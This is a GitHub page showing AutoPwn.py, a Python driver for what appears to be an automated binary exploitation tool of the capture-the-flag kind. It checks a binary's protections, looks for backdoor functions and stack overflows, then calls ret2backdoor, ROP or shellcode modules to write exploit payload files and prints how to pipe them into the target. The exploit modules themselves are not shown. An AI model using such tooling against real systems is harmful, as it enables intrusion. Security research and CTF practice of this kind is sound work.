-
Notifications
You must be signed in to change notification settings - Fork 0
/
AutoPwn.py
executable file
·101 lines (90 loc) · 3.97 KB
/
AutoPwn.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
#!/usr/bin/env python3
import argparse
import logging
import os
import sys
from pwncli import *
from analysis import inputDetector
from analysis import protectionDetector
from analysis import backdoorDetector
from analysis import overflowDetector_static
from analysis import overflowDetector_dynamic
from exploits import ret2backdoor
from exploits import stackRop
from exploits import stackShellcode
logging.basicConfig()
logging.root.setLevel(logging.INFO)
log = logging.getLogger(__name__)
binary_file_path = ""
input_funcs = []
def main():
parser = argparse.ArgumentParser()
parser.add_argument("file", help="File to analyze")
args = parser.parse_args()
if args.file is None:
log.info("[-] Exitting no file specified")
exit(1)
binary_file_path = os.path.abspath(args.file)
log.info("[+] Check input functions")
input_funcs = inputDetector.getInputFuncs(binary_file_path)
log.info("[+] Check properties")
properties = protectionDetector.getProperties(binary_file_path)
log.info("[+] Check backdoor")
backdoors = backdoorDetector.getBackdoors(binary_file_path)
log.info("[+] Check overflow")
overflow_list = overflowDetector_static.analysis(binary_file_path,
input_funcs, properties)
if len(overflow_list) > 0:
log.info("[+] Overflow exist")
if not properties['canary']:
log.info("[+] No Canary")
if len(backdoors) > 0:
log.info("[+] Backdoors exist")
if not properties['pie']:
log.info("[+] No PIE")
payload = ret2backdoor.exploit(binary_file_path, overflow_list,
backdoors)
binary_name = os.path.basename(binary_file_path)
for p in range(len(payload)):
filename = '%s-exploit-%s' % (binary_name, p + 1)
with open(filename, 'wb') as f:
f.write(payload[p])
print("%s exploit in %s" % (binary_name, filename))
print("run with `(cat %s; cat -) | %s`" % (filename, binary_file_path))
elif properties['relro'] != 'Full':
log.info("[+] Try ROP")
if not properties['pie']:
log.info("[+] No PIE")
stackRop.exp(binary_file_path, overflow_list)
elif properties['RWX']:
log.info("[+] Has RWX segments")
stackShellcode.exp(binary_file_path, properties)
# exploitable_state = overflowDetector_dynamic.analysis(binary_file_path)
# ret2backdoor.exploit_dynamic(exploitable_state,backdoors)
def stackShellcodeTest():
parser = argparse.ArgumentParser()
parser.add_argument("file", help="File to analyze")
args = parser.parse_args()
binary_file_path = os.path.abspath(args.file)
properties = protectionDetector.getProperties(binary_file_path)
stackShellcode.exp(binary_file_path, properties)
def ret2backdoorTest():
parser = argparse.ArgumentParser()
parser.add_argument("file", help="File to analyze")
args = parser.parse_args()
binary_file_path = os.path.abspath(args.file)
input_funcs = inputDetector.getInputFuncs(binary_file_path)
properties = protectionDetector.getProperties(binary_file_path)
backdoors = backdoorDetector.getBackdoors(binary_file_path)
overflow_list = overflowDetector_static.analysis(binary_file_path,
input_funcs)
payload = ret2backdoor.exploit(binary_file_path, overflow_list, backdoors)
binary_name = os.path.basename(binary_file_path)
for p in range(len(payload)):
filename = '%s-exploit-%s' % (binary_name, p + 1)
with open(filename, 'wb') as f:
f.write(payload[p])
print("%s exploit in %s" % (binary_name, filename))
print("run with `(cat %s; cat -) | %s`" % (filename, binary_file_path))
if __name__ == "__main__":
main()